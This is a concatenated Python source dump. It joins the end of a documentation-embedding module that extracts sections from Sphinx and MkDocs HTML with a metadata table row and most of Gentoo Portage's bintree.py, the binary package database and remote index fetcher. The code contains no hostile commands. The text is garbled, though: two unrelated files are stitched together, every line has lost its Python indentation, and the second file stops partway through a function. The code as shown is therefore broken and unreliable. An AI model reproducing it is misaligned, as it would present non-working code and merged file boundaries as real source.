f'{doc}.fjson'.lstrip('/'),
)
try:
with build_media_storage.open(file_path) as file:
return json.load(file)
except Exception: # noqa
log.warning('Unable to read file. file_path=%s', file_path)
return None
def parse_sphinx(content, section, url):
"""Get the embed content for the section."""
body = content.get('body')
toc = content.get('toc')
if not content or not body or not toc:
return (None, None, section)
headers = [
recurse_while_none(element)
for element in PQ(toc)('a')
]
if not section and headers:
# If no section is sent, return the content of the first one
# TODO: This will always be the full page content,
# lets do something smarter here
section = list(headers[0].keys())[0].lower()
if not section:
return [], headers, None
body_obj = PQ(body)
escaped_section = escape_selector(section)
elements_id = [
escaped_section,
slugify(escaped_section),
make_id(escaped_section),
f'module-{escaped_section}',
]
query_result = []
for element_id in elements_id:
if not element_id:
continue
try:
query_result = body_obj(f'#{element_id}')
if query_result:
break
except Exception: # noqa
log.info(
'Failed to query section. url=%s id=%s',
url, element_id,
)
if not query_result:
selector = f':header:contains("{escaped_section}")'
query_result = body_obj(selector).parent()
# Handle ``dt`` special cases
if len(query_result) == 1 and query_result[0].tag == 'dt':
parent = query_result.parent()
if 'glossary' in parent.attr('class'):
# Sphinx HTML structure for term glossary puts the ``id`` in the
# ``dt`` element with the title of the term. In this case, we
# need to return the next sibling which contains the definition
# of the term itself.
# Structure:
# <dl class="glossary docutils">
# <dt id="term-definition">definition</dt>
# <dd>Text definition for the term</dd>
# ...
# </dl>
query_result = query_result.next()
elif 'citation' in parent.attr('class'):
# Sphinx HTML structure for sphinxcontrib-bibtex puts the ``id`` in the
# ``dt`` element with the title of the cite. In this case, we
# need to return the next sibling which contains the cite itself.
# Structure:
# <dl class="citation">
# <dt id="cite-id"><span><a>Title of the cite</a></span></dt>
# <dd>Content of the cite</dd>
# ...
# </dl>
query_result = query_result.next()
else:
# Sphinx HTML structure for definition list puts the ``id``
# the ``dt`` element, instead of the ``dl``. This makes
# the backend to return just the title of the definition. If we
# detect this case, we return the parent (the whole ``dl``)
# Structure:
# <dl class="confval">
# <dt id="confval-config">
# <code class="descname">config</code>
# <a class="headerlink" href="#confval-config">¶</a></dt>
# <dd><p>Text with a description</p></dd>
# </dl>
query_result = parent
def dump(obj):
"""Handle API-based doc HTML."""
if obj[0].tag in ['span', 'h2']:
return obj.parent().outerHtml()
return obj.outerHtml()
ret = [
dump(clean_links(PQ(obj), url))
for obj in query_result
]
return ret, headers, section
def parse_mkdocs(content, section, url): # pylint: disable=unused-argument
"""Get the embed content for the section."""
ret = []
headers = []
if not content or not content.get('content'):
return (None, None, section)
body = content['content']
for element in PQ(body)('h2'):
headers.append(recurse_while_none(element))
if not section and headers:
# If no section is sent, return the content of the first one
section = list(headers[0].keys())[0].lower()
if section:
body_obj = PQ(body)
escaped_section = escape_selector(section)
section_list = body_obj(
':header:contains("{title}")'.format(title=str(escaped_section)))
for num in range(len(section_list)):
header2 = section_list.eq(num)
# h2_title = h2.text().strip()
# section_id = h2.attr('id')
h2_content = ""
next_p = header2.next()
while next_p:
if next_p[0].tag == 'h2':
break
h2_html = next_p.outerHtml()
if h2_html:
h2_content += "\n%s\n" % h2_html
next_p = next_p.next()
if h2_content:
ret.append(h2_content)
# ret.append({
# 'id': section_id,
# 'title': h2_title,
# 'content': h2_content,
# })
return (ret, headers, section)
| mit | -5,494,567,154,929,641,000 | 30.733967 | 145 | 0.565569 | false |
clickbeetle/portage-cb | pym/portage/dbapi/bintree.py | 1 | 44915 | # Copyright 1998-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = ["bindbapi", "binarytree"]
import portage
portage.proxy.lazyimport.lazyimport(globals(),
'portage.checksum:hashfunc_map,perform_multiple_checksums,' + \
'verify_all,_apply_hash_filter,_hash_filter',
'portage.dbapi.dep_expand:dep_expand',
'portage.dep:dep_getkey,isjustname,isvalidatom,match_from_list',
'portage.output:EOutput,colorize',
'portage.locks:lockfile,unlockfile',
'portage.package.ebuild.fetch:_check_distfile,_hide_url_passwd',
'portage.update:update_dbentries',
'portage.util:atomic_ofstream,ensure_dirs,normalize_path,' + \
'writemsg,writemsg_stdout',
'portage.util.listdir:listdir',
'portage.util._urlopen:urlopen@_urlopen',
'portage.versions:best,catpkgsplit,catsplit,_pkg_str',
)
from portage.cache.mappings import slot_dict_class
from portage.const import CACHE_PATH
from portage.dbapi.virtual import fakedbapi
from portage.dep import Atom, use_reduce, paren_enclose
from portage.exception import AlarmSignal, InvalidData, InvalidPackageName, \
PermissionDenied, PortageException
from portage.localization import _
from portage import _movefile
from portage import os
from portage import _encodings
from portage import _unicode_decode
from portage import _unicode_encode
import codecs
import errno
import io
import stat
import subprocess
import sys
import tempfile
import textwrap
import warnings
from gzip import GzipFile
from itertools import chain
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
if sys.hexversion >= 0x3000000:
_unicode = str
basestring = str
long = int
else:
_unicode = unicode
class UseCachedCopyOfRemoteIndex(Exception):
# If the local copy is recent enough
# then fetching the remote index can be skipped.
pass
class bindbapi(fakedbapi):
_known_keys = frozenset(list(fakedbapi._known_keys) + \
["CHOST", "repository", "USE"])
def __init__(self, mybintree=None, **kwargs):
fakedbapi.__init__(self, **kwargs)
self.bintree = mybintree
self.move_ent = mybintree.move_ent
self.cpvdict={}
self.cpdict={}
# Selectively cache metadata in order to optimize dep matching.
self._aux_cache_keys = set(
["BUILD_TIME", "CHOST", "DEPEND", "EAPI",
"HDEPEND", "IUSE", "KEYWORDS",
"LICENSE", "PDEPEND", "PROPERTIES", "PROVIDE",
"RDEPEND", "repository", "RESTRICT", "SLOT", "USE", "DEFINED_PHASES"
])
self._aux_cache_slot_dict = slot_dict_class(self._aux_cache_keys)
self._aux_cache = {}
def match(self, *pargs, **kwargs):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
return fakedbapi.match(self, *pargs, **kwargs)
def cpv_exists(self, cpv, myrepo=None):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cpv_exists(self, cpv)
def cpv_inject(self, cpv, **kwargs):
self._aux_cache.pop(cpv, None)
fakedbapi.cpv_inject(self, cpv, **kwargs)
def cpv_remove(self, cpv):
self._aux_cache.pop(cpv, None)
fakedbapi.cpv_remove(self, cpv)
def aux_get(self, mycpv, wants, myrepo=None):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
cache_me = False
if not self._known_keys.intersection(
wants).difference(self._aux_cache_keys):
aux_cache = self._aux_cache.get(mycpv)
if aux_cache is not None:
return [aux_cache.get(x, "") for x in wants]
cache_me = True
mysplit = mycpv.split("/")
mylist = []
tbz2name = mysplit[1]+".tbz2"
if not self.bintree._remotepkgs or \
not self.bintree.isremote(mycpv):
tbz2_path = self.bintree.getname(mycpv)
if not os.path.exists(tbz2_path):
raise KeyError(mycpv)
metadata_bytes = portage.xpak.tbz2(tbz2_path).get_data()
def getitem(k):
v = metadata_bytes.get(_unicode_encode(k,
encoding=_encodings['repo.content'],
errors='backslashreplace'))
if v is not None:
v = _unicode_decode(v,
encoding=_encodings['repo.content'], errors='replace')
return v
else:
getitem = self.bintree._remotepkgs[mycpv].get
mydata = {}
mykeys = wants
if cache_me:
mykeys = self._aux_cache_keys.union(wants)
for x in mykeys:
myval = getitem(x)
# myval is None if the key doesn't exist
# or the tbz2 is corrupt.
if myval:
mydata[x] = " ".join(myval.split())
if not mydata.setdefault('EAPI', _unicode_decode('0')):
mydata['EAPI'] = _unicode_decode('0')
if cache_me:
aux_cache = self._aux_cache_slot_dict()
for x in self._aux_cache_keys:
aux_cache[x] = mydata.get(x, _unicode_decode(''))
self._aux_cache[mycpv] = aux_cache
return [mydata.get(x, _unicode_decode('')) for x in wants]
def aux_update(self, cpv, values):
if not self.bintree.populated:
self.bintree.populate()
tbz2path = self.bintree.getname(cpv)
if not os.path.exists(tbz2path):
raise KeyError(cpv)
mytbz2 = portage.xpak.tbz2(tbz2path)
mydata = mytbz2.get_data()
for k, v in values.items():
k = _unicode_encode(k,
encoding=_encodings['repo.content'], errors='backslashreplace')
v = _unicode_encode(v,
encoding=_encodings['repo.content'], errors='backslashreplace')
mydata[k] = v
for k, v in list(mydata.items()):
if not v:
del mydata[k]
mytbz2.recompose_mem(portage.xpak.xpak_mem(mydata))
# inject will clear stale caches via cpv_inject.
self.bintree.inject(cpv)
def cp_list(self, *pargs, **kwargs):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cp_list(self, *pargs, **kwargs)
def cp_all(self):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cp_all(self)
def cpv_all(self):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cpv_all(self)
def getfetchsizes(self, pkg):
"""
This will raise MissingSignature if SIZE signature is not available,
or InvalidSignature if SIZE signature is invalid.
"""
if not self.bintree.populated:
self.bintree.populate()
pkg = getattr(pkg, 'cpv', pkg)
filesdict = {}
if not self.bintree.isremote(pkg):
pass
else:
metadata = self.bintree._remotepkgs[pkg]
try:
size = int(metadata["SIZE"])
except KeyError:
raise portage.exception.MissingSignature("SIZE")
except ValueError:
raise portage.exception.InvalidSignature(
"SIZE: %s" % metadata["SIZE"])
else:
filesdict[os.path.basename(self.bintree.getname(pkg))] = size
return filesdict
def _pkgindex_cpv_map_latest_build(pkgindex):
"""
Given a PackageIndex instance, create a dict of cpv -> metadata map.
If multiple packages have identical CPV values, prefer the package
with latest BUILD_TIME value.
@param pkgindex: A PackageIndex instance.
@type pkgindex: PackageIndex
@rtype: dict
@return: a dict containing entry for the give cpv.
"""
cpv_map = {}
for d in pkgindex.packages:
cpv = d["CPV"]
try:
cpv = _pkg_str(cpv)
except InvalidData:
writemsg(_("!!! Invalid remote binary package: %s\n") % cpv,
noiselevel=-1)
continue
btime = d.get('BUILD_TIME', '')
try:
btime = int(btime)
except ValueError:
btime = None
other_d = cpv_map.get(cpv)
if other_d is not None:
other_btime = other_d.get('BUILD_TIME', '')
try:
other_btime = int(other_btime)
except ValueError:
other_btime = None
if other_btime and (not btime or other_btime > btime):
continue
cpv_map[_pkg_str(cpv)] = d
return cpv_map
class binarytree(object):
"this tree scans for a list of all packages available in PKGDIR"
def __init__(self, _unused=None, pkgdir=None,
virtual=DeprecationWarning, settings=None):
if pkgdir is None:
raise TypeError("pkgdir parameter is required")
if settings is None:
raise TypeError("settings parameter is required")
if _unused is not None and _unused != settings['ROOT']:
warnings.warn("The root parameter of the "
"portage.dbapi.bintree.binarytree"
" constructor is now unused. Use "
"settings['ROOT'] instead.",
DeprecationWarning, stacklevel=2)
if virtual is not DeprecationWarning:
warnings.warn("The 'virtual' parameter of the "
"portage.dbapi.bintree.binarytree"
" constructor is unused",
DeprecationWarning, stacklevel=2)
if True:
self.pkgdir = normalize_path(pkgdir)
self.dbapi = bindbapi(self, settings=settings)
self.update_ents = self.dbapi.update_ents
self.move_slot_ent = self.dbapi.move_slot_ent
self.populated = 0
self.tree = {}
self._remote_has_index = False
self._remotepkgs = None # remote metadata indexed by cpv
self.invalids = []
self.settings = settings
self._pkg_paths = {}
self._pkgindex_uri = {}
self._populating = False
self._all_directory = os.path.isdir(
os.path.join(self.pkgdir, "All"))
self._pkgindex_version = 0
self._pkgindex_hashes = ["MD5","SHA1"]
self._pkgindex_file = os.path.join(self.pkgdir, "Packages")
self._pkgindex_keys = self.dbapi._aux_cache_keys.copy()
self._pkgindex_keys.update(["CPV", "MTIME", "SIZE"])
self._pkgindex_aux_keys = \
["BUILD_TIME", "CHOST", "DEPEND", "DESCRIPTION", "EAPI",
"HDEPEND", "IUSE", "KEYWORDS", "LICENSE", "PDEPEND", "PROPERTIES",
"PROVIDE", "RDEPEND", "repository", "SLOT", "USE", "DEFINED_PHASES",
"BASE_URI"]
self._pkgindex_aux_keys = list(self._pkgindex_aux_keys)
self._pkgindex_use_evaluated_keys = \
("DEPEND", "HDEPEND", "LICENSE", "RDEPEND",
"PDEPEND", "PROPERTIES", "PROVIDE")
self._pkgindex_header_keys = set([
"ACCEPT_KEYWORDS", "ACCEPT_LICENSE",
"ACCEPT_PROPERTIES", "CBUILD",
"CONFIG_PROTECT", "CONFIG_PROTECT_MASK", "FEATURES",
"GENTOO_MIRRORS", "INSTALL_MASK", "SYNC", "USE"])
self._pkgindex_default_pkg_data = {
"BUILD_TIME" : "",
"DEFINED_PHASES" : "",
"DEPEND" : "",
"EAPI" : "0",
"HDEPEND" : "",
"IUSE" : "",
"KEYWORDS": "",
"LICENSE" : "",
"PATH" : "",
"PDEPEND" : "",
"PROPERTIES" : "",
"PROVIDE" : "",
"RDEPEND" : "",
"RESTRICT": "",
"SLOT" : "0",
"USE" : "",
}
self._pkgindex_inherited_keys = ["CHOST", "repository"]
# Populate the header with appropriate defaults.
self._pkgindex_default_header_data = {
"CHOST" : self.settings.get("CHOST", ""),
"repository" : "",
}
# It is especially important to populate keys like
# "repository" that save space when entries can
# inherit them from the header. If an existing
# pkgindex header already defines these keys, then
# they will appropriately override our defaults.
main_repo = self.settings.repositories.mainRepo()
if main_repo is not None and not main_repo.missing_repo_name:
self._pkgindex_default_header_data["repository"] = \
main_repo.name
self._pkgindex_translated_keys = (
("DESCRIPTION" , "DESC"),
("repository" , "REPO"),
)
self._pkgindex_allowed_pkg_keys = set(chain(
self._pkgindex_keys,
self._pkgindex_aux_keys,
self._pkgindex_hashes,
self._pkgindex_default_pkg_data,
self._pkgindex_inherited_keys,
chain(*self._pkgindex_translated_keys)
))
@property
def root(self):
warnings.warn("The root attribute of "
"portage.dbapi.bintree.binarytree"
" is deprecated. Use "
"settings['ROOT'] instead.",
DeprecationWarning, stacklevel=3)
return self.settings['ROOT']
def move_ent(self, mylist, repo_match=None):
if not self.populated:
self.populate()
origcp = mylist[1]
newcp = mylist[2]
# sanity check
for atom in (origcp, newcp):
if not isjustname(atom):
raise InvalidPackageName(str(atom))
mynewcat = catsplit(newcp)[0]
origmatches=self.dbapi.cp_list(origcp)
moves = 0
if not origmatches:
return moves
for mycpv in origmatches:
try:
mycpv = self.dbapi._pkg_str(mycpv, None)
except (KeyError, InvalidData):
continue
mycpv_cp = portage.cpv_getkey(mycpv)
if mycpv_cp != origcp:
# Ignore PROVIDE virtual match.
continue
if repo_match is not None \
and not repo_match(mycpv.repo):
continue
# Use isvalidatom() to check if this move is valid for the
# EAPI (characters allowed in package names may vary).
if not isvalidatom(newcp, eapi=mycpv.eapi):
continue
mynewcpv = mycpv.replace(mycpv_cp, _unicode(newcp), 1)
myoldpkg = catsplit(mycpv)[1]
mynewpkg = catsplit(mynewcpv)[1]
if (mynewpkg != myoldpkg) and os.path.exists(self.getname(mynewcpv)):
writemsg(_("!!! Cannot update binary: Destination exists.\n"),
noiselevel=-1)
writemsg("!!! "+mycpv+" -> "+mynewcpv+"\n", noiselevel=-1)
continue
tbz2path = self.getname(mycpv)
if os.path.exists(tbz2path) and not os.access(tbz2path,os.W_OK):
writemsg(_("!!! Cannot update readonly binary: %s\n") % mycpv,
noiselevel=-1)
continue
moves += 1
mytbz2 = portage.xpak.tbz2(tbz2path)
mydata = mytbz2.get_data()
updated_items = update_dbentries([mylist], mydata, eapi=mycpv.eapi)
mydata.update(updated_items)
mydata[b'PF'] = \
_unicode_encode(mynewpkg + "\n",
encoding=_encodings['repo.content'])
mydata[b'CATEGORY'] = \
_unicode_encode(mynewcat + "\n",
encoding=_encodings['repo.content'])
if mynewpkg != myoldpkg:
ebuild_data = mydata.pop(_unicode_encode(myoldpkg + '.ebuild',
encoding=_encodings['repo.content']), None)
if ebuild_data is not None:
mydata[_unicode_encode(mynewpkg + '.ebuild',
encoding=_encodings['repo.content'])] = ebuild_data
mytbz2.recompose_mem(portage.xpak.xpak_mem(mydata))
self.dbapi.cpv_remove(mycpv)
del self._pkg_paths[mycpv]
new_path = self.getname(mynewcpv)
self._pkg_paths[mynewcpv] = os.path.join(
*new_path.split(os.path.sep)[-2:])
if new_path != mytbz2:
self._ensure_dir(os.path.dirname(new_path))
_movefile(tbz2path, new_path, mysettings=self.settings)
self._remove_symlink(mycpv)
if new_path.split(os.path.sep)[-2] == "All":
self._create_symlink(mynewcpv)
self.inject(mynewcpv)
return moves
def _remove_symlink(self, cpv):
"""Remove a ${PKGDIR}/${CATEGORY}/${PF}.tbz2 symlink and also remove
the ${PKGDIR}/${CATEGORY} directory if empty. The file will not be
removed if os.path.islink() returns False."""
mycat, mypkg = catsplit(cpv)
mylink = os.path.join(self.pkgdir, mycat, mypkg + ".tbz2")
if os.path.islink(mylink):
"""Only remove it if it's really a link so that this method never
removes a real package that was placed here to avoid a collision."""
os.unlink(mylink)
try:
os.rmdir(os.path.join(self.pkgdir, mycat))
except OSError as e:
if e.errno not in (errno.ENOENT,
errno.ENOTEMPTY, errno.EEXIST):
raise
del e
def _create_symlink(self, cpv):
"""Create a ${PKGDIR}/${CATEGORY}/${PF}.tbz2 symlink (and
${PKGDIR}/${CATEGORY} directory, if necessary). Any file that may
exist in the location of the symlink will first be removed."""
mycat, mypkg = catsplit(cpv)
full_path = os.path.join(self.pkgdir, mycat, mypkg + ".tbz2")
self._ensure_dir(os.path.dirname(full_path))
try:
os.unlink(full_path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
del e
os.symlink(os.path.join("..", "All", mypkg + ".tbz2"), full_path)
def prevent_collision(self, cpv):
"""Make sure that the file location ${PKGDIR}/All/${PF}.tbz2 is safe to
use for a given cpv. If a collision will occur with an existing
package from another category, the existing package will be bumped to
${PKGDIR}/${CATEGORY}/${PF}.tbz2 so that both can coexist."""
if not self._all_directory:
return
# Copy group permissions for new directories that
# may have been created.
for path in ("All", catsplit(cpv)[0]):
path = os.path.join(self.pkgdir, path)
self._ensure_dir(path)
if not os.access(path, os.W_OK):
raise PermissionDenied("access('%s', W_OK)" % path)
full_path = self.getname(cpv)
if "All" == full_path.split(os.path.sep)[-2]:
return
"""Move a colliding package if it exists. Code below this point only
executes in rare cases."""
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
mypath = os.path.join("All", myfile)
dest_path = os.path.join(self.pkgdir, mypath)
try:
st = os.lstat(dest_path)
except OSError:
st = None
else:
if stat.S_ISLNK(st.st_mode):
st = None
try:
os.unlink(dest_path)
except OSError:
if os.path.exists(dest_path):
raise
if st is not None:
# For invalid packages, other_cat could be None.
other_cat = portage.xpak.tbz2(dest_path).getfile(b"CATEGORY")
if other_cat:
other_cat = _unicode_decode(other_cat,
encoding=_encodings['repo.content'], errors='replace')
other_cat = other_cat.strip()
other_cpv = other_cat + "/" + mypkg
self._move_from_all(other_cpv)
self.inject(other_cpv)
self._move_to_all(cpv)
def _ensure_dir(self, path):
"""
Create the specified directory. Also, copy gid and group mode
bits from self.pkgdir if possible.
@param cat_dir: Absolute path of the directory to be created.
@type cat_dir: String
"""
try:
pkgdir_st = os.stat(self.pkgdir)
except OSError:
ensure_dirs(path)
return
pkgdir_gid = pkgdir_st.st_gid
pkgdir_grp_mode = 0o2070 & pkgdir_st.st_mode
try:
ensure_dirs(path, gid=pkgdir_gid, mode=pkgdir_grp_mode, mask=0)
except PortageException:
if not os.path.isdir(path):
raise
def _move_to_all(self, cpv):
"""If the file exists, move it. Whether or not it exists, update state
for future getname() calls."""
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
self._pkg_paths[cpv] = os.path.join("All", myfile)
src_path = os.path.join(self.pkgdir, mycat, myfile)
try:
mystat = os.lstat(src_path)
except OSError as e:
mystat = None
if mystat and stat.S_ISREG(mystat.st_mode):
self._ensure_dir(os.path.join(self.pkgdir, "All"))
dest_path = os.path.join(self.pkgdir, "All", myfile)
_movefile(src_path, dest_path, mysettings=self.settings)
self._create_symlink(cpv)
self.inject(cpv)
def _move_from_all(self, cpv):
"""Move a package from ${PKGDIR}/All/${PF}.tbz2 to
${PKGDIR}/${CATEGORY}/${PF}.tbz2 and update state from getname calls."""
self._remove_symlink(cpv)
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
mypath = os.path.join(mycat, myfile)
dest_path = os.path.join(self.pkgdir, mypath)
self._ensure_dir(os.path.dirname(dest_path))
src_path = os.path.join(self.pkgdir, "All", myfile)
_movefile(src_path, dest_path, mysettings=self.settings)
self._pkg_paths[cpv] = mypath
def populate(self, getbinpkgs=0):
"populates the binarytree"
if self._populating:
return
pkgindex_lock = None
try:
if os.access(self.pkgdir, os.W_OK):
pkgindex_lock = lockfile(self._pkgindex_file,
wantnewlockfile=1)
self._populating = True
self._populate(getbinpkgs)
finally:
if pkgindex_lock:
unlockfile(pkgindex_lock)
self._populating = False
def _populate(self, getbinpkgs=0):
if (not os.path.isdir(self.pkgdir) and not getbinpkgs):
return 0
# Clear all caches in case populate is called multiple times
# as may be the case when _global_updates calls populate()
# prior to performing package moves since it only wants to
# operate on local packages (getbinpkgs=0).
self._remotepkgs = None
self.dbapi._clear_cache()
self.dbapi._aux_cache.clear()
if True:
pkg_paths = {}
self._pkg_paths = pkg_paths
dirs = listdir(self.pkgdir, dirsonly=True, EmptyOnError=True)
if "All" in dirs:
dirs.remove("All")
dirs.sort()
dirs.insert(0, "All")
pkgindex = self._load_pkgindex()
pf_index = None
if not self._pkgindex_version_supported(pkgindex):
pkgindex = self._new_pkgindex()
header = pkgindex.header
metadata = {}
for d in pkgindex.packages:
metadata[d["CPV"]] = d
update_pkgindex = False
for mydir in dirs:
for myfile in listdir(os.path.join(self.pkgdir, mydir)):
if not myfile.endswith(".tbz2"):
continue
mypath = os.path.join(mydir, myfile)
full_path = os.path.join(self.pkgdir, mypath)
s = os.lstat(full_path)
if stat.S_ISLNK(s.st_mode):
continue
# Validate data from the package index and try to avoid
# reading the xpak if possible.
if mydir != "All":
possibilities = None
d = metadata.get(mydir+"/"+myfile[:-5])
if d:
possibilities = [d]
else:
if pf_index is None:
pf_index = {}
for mycpv in metadata:
mycat, mypf = catsplit(mycpv)
pf_index.setdefault(
mypf, []).append(metadata[mycpv])
possibilities = pf_index.get(myfile[:-5])
if possibilities:
match = None
for d in possibilities:
try:
if long(d["MTIME"]) != s[stat.ST_MTIME]:
continue
except (KeyError, ValueError):
continue
try:
if long(d["SIZE"]) != long(s.st_size):
continue
except (KeyError, ValueError):
continue
if not self._pkgindex_keys.difference(d):
match = d
break
if match:
mycpv = match["CPV"]
if mycpv in pkg_paths:
# discard duplicates (All/ is preferred)
continue
mycpv = _pkg_str(mycpv)
pkg_paths[mycpv] = mypath
# update the path if the package has been moved
oldpath = d.get("PATH")
if oldpath and oldpath != mypath:
update_pkgindex = True
if mypath != mycpv + ".tbz2":
d["PATH"] = mypath
if not oldpath:
update_pkgindex = True
else:
d.pop("PATH", None)
if oldpath:
update_pkgindex = True
self.dbapi.cpv_inject(mycpv)
if not self.dbapi._aux_cache_keys.difference(d):
aux_cache = self.dbapi._aux_cache_slot_dict()
for k in self.dbapi._aux_cache_keys:
aux_cache[k] = d[k]
self.dbapi._aux_cache[mycpv] = aux_cache
continue
if not os.access(full_path, os.R_OK):
writemsg(_("!!! Permission denied to read " \
"binary package: '%s'\n") % full_path,
noiselevel=-1)
self.invalids.append(myfile[:-5])
continue
metadata_bytes = portage.xpak.tbz2(full_path).get_data()
mycat = _unicode_decode(metadata_bytes.get(b"CATEGORY", ""),
encoding=_encodings['repo.content'], errors='replace')
mypf = _unicode_decode(metadata_bytes.get(b"PF", ""),
encoding=_encodings['repo.content'], errors='replace')
slot = _unicode_decode(metadata_bytes.get(b"SLOT", ""),
encoding=_encodings['repo.content'], errors='replace')
mypkg = myfile[:-5]
if not mycat or not mypf or not slot:
#old-style or corrupt package
writemsg(_("\n!!! Invalid binary package: '%s'\n") % full_path,
noiselevel=-1)
missing_keys = []
if not mycat:
missing_keys.append("CATEGORY")
if not mypf:
missing_keys.append("PF")
if not slot:
missing_keys.append("SLOT")
msg = []
if missing_keys:
missing_keys.sort()
msg.append(_("Missing metadata key(s): %s.") % \
", ".join(missing_keys))
msg.append(_(" This binary package is not " \
"recoverable and should be deleted."))
for line in textwrap.wrap("".join(msg), 72):
writemsg("!!! %s\n" % line, noiselevel=-1)
self.invalids.append(mypkg)
continue
mycat = mycat.strip()
slot = slot.strip()
if mycat != mydir and mydir != "All":
continue
if mypkg != mypf.strip():
continue
mycpv = mycat + "/" + mypkg
if mycpv in pkg_paths:
# All is first, so it's preferred.
continue
if not self.dbapi._category_re.match(mycat):
writemsg(_("!!! Binary package has an " \
"unrecognized category: '%s'\n") % full_path,
noiselevel=-1)
writemsg(_("!!! '%s' has a category that is not" \
" listed in %setc/portage/categories\n") % \
(mycpv, self.settings["PORTAGE_CONFIGROOT"]),
noiselevel=-1)
continue
mycpv = _pkg_str(mycpv)
pkg_paths[mycpv] = mypath
self.dbapi.cpv_inject(mycpv)
update_pkgindex = True
d = metadata.get(mycpv, {})
if d:
try:
if long(d["MTIME"]) != s[stat.ST_MTIME]:
d.clear()
except (KeyError, ValueError):
d.clear()
if d:
try:
if long(d["SIZE"]) != long(s.st_size):
d.clear()
except (KeyError, ValueError):
d.clear()
d["CPV"] = mycpv
d["SLOT"] = slot
d["MTIME"] = str(s[stat.ST_MTIME])
d["SIZE"] = str(s.st_size)
d.update(zip(self._pkgindex_aux_keys,
self.dbapi.aux_get(mycpv, self._pkgindex_aux_keys)))
try:
self._eval_use_flags(mycpv, d)
except portage.exception.InvalidDependString:
writemsg(_("!!! Invalid binary package: '%s'\n") % \
self.getname(mycpv), noiselevel=-1)
self.dbapi.cpv_remove(mycpv)
del pkg_paths[mycpv]
# record location if it's non-default
if mypath != mycpv + ".tbz2":
d["PATH"] = mypath
else:
d.pop("PATH", None)
metadata[mycpv] = d
if not self.dbapi._aux_cache_keys.difference(d):
aux_cache = self.dbapi._aux_cache_slot_dict()
for k in self.dbapi._aux_cache_keys:
aux_cache[k] = d[k]
self.dbapi._aux_cache[mycpv] = aux_cache
for cpv in list(metadata):
if cpv not in pkg_paths:
del metadata[cpv]
# Do not bother to write the Packages index if $PKGDIR/All/ exists
# since it will provide no benefit due to the need to read CATEGORY
# from xpak.
if update_pkgindex and os.access(self.pkgdir, os.W_OK):
del pkgindex.packages[:]
pkgindex.packages.extend(iter(metadata.values()))
self._update_pkgindex_header(pkgindex.header)
self._pkgindex_write(pkgindex)
if getbinpkgs and not self.settings["PORTAGE_BINHOST"]:
writemsg(_("!!! PORTAGE_BINHOST unset, but use is requested.\n"),
noiselevel=-1)
if not getbinpkgs or 'PORTAGE_BINHOST' not in self.settings:
self.populated=1
return
self._remotepkgs = {}
for base_url in self.settings["PORTAGE_BINHOST"].split():
parsed_url = urlparse(base_url)
host = parsed_url.netloc
port = parsed_url.port
user = None
passwd = None
user_passwd = ""
if "@" in host:
user, host = host.split("@", 1)
user_passwd = user + "@"
if ":" in user:
user, passwd = user.split(":", 1)
port_args = []
if port is not None:
port_str = ":%s" % (port,)
if host.endswith(port_str):
host = host[:-len(port_str)]
pkgindex_file = os.path.join(self.settings["EROOT"], CACHE_PATH, "binhost",
host, parsed_url.path.lstrip("/"), "Packages")
pkgindex = self._new_pkgindex()
try:
f = io.open(_unicode_encode(pkgindex_file,
encoding=_encodings['fs'], errors='strict'),
mode='r', encoding=_encodings['repo.content'],
errors='replace')
try:
pkgindex.read(f)
finally:
f.close()
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
local_timestamp = pkgindex.header.get("TIMESTAMP", None)
remote_timestamp = None
rmt_idx = self._new_pkgindex()
proc = None
tmp_filename = None
try:
# urlparse.urljoin() only works correctly with recognized
# protocols and requires the base url to have a trailing
# slash, so join manually...
url = base_url.rstrip("/") + "/Packages"
try:
f = _urlopen(url, if_modified_since=local_timestamp)
if hasattr(f, 'headers') and f.headers.get('timestamp', ''):
remote_timestamp = f.headers.get('timestamp')
except IOError as err:
if hasattr(err, 'code') and err.code == 304: # not modified (since local_timestamp)
raise UseCachedCopyOfRemoteIndex()
path = parsed_url.path.rstrip("/") + "/Packages"
if parsed_url.scheme == 'sftp':
# The sftp command complains about 'Illegal seek' if
# we try to make it write to /dev/stdout, so use a
# temp file instead.
fd, tmp_filename = tempfile.mkstemp()
os.close(fd)
if port is not None:
port_args = ['-P', "%s" % (port,)]
proc = subprocess.Popen(['sftp'] + port_args + \
[user_passwd + host + ":" + path, tmp_filename])
if proc.wait() != os.EX_OK:
raise
f = open(tmp_filename, 'rb')
elif parsed_url.scheme == 'ssh':
if port is not None:
port_args = ['-p', "%s" % (port,)]
proc = subprocess.Popen(['ssh'] + port_args + \
[user_passwd + host, '--', 'cat', path],
stdout=subprocess.PIPE)
f = proc.stdout
else:
setting = 'FETCHCOMMAND_' + parsed_url.scheme.upper()
fcmd = self.settings.get(setting)
if not fcmd:
raise
fd, tmp_filename = tempfile.mkstemp()
tmp_dirname, tmp_basename = os.path.split(tmp_filename)
os.close(fd)
success = portage.getbinpkg.file_get(url,
tmp_dirname, fcmd=fcmd, filename=tmp_basename)
if not success:
raise EnvironmentError("%s failed" % (setting,))
f = open(tmp_filename, 'rb')
f_dec = codecs.iterdecode(f,
_encodings['repo.content'], errors='replace')
try:
rmt_idx.readHeader(f_dec)
if not remote_timestamp: # in case it had not been read from HTTP header
remote_timestamp = rmt_idx.header.get("TIMESTAMP", None)
if not remote_timestamp:
# no timestamp in the header, something's wrong
pkgindex = None
writemsg(_("\n\n!!! Binhost package index " \
" has no TIMESTAMP field.\n"), noiselevel=-1)
else:
if not self._pkgindex_version_supported(rmt_idx):
writemsg(_("\n\n!!! Binhost package index version" \
" is not supported: '%s'\n") % \
rmt_idx.header.get("VERSION"), noiselevel=-1)
pkgindex = None
elif local_timestamp != remote_timestamp:
rmt_idx.readBody(f_dec)
pkgindex = rmt_idx
finally:
# Timeout after 5 seconds, in case close() blocks
# indefinitely (see bug #350139).
try:
try:
AlarmSignal.register(5)
f.close()
finally:
AlarmSignal.unregister()
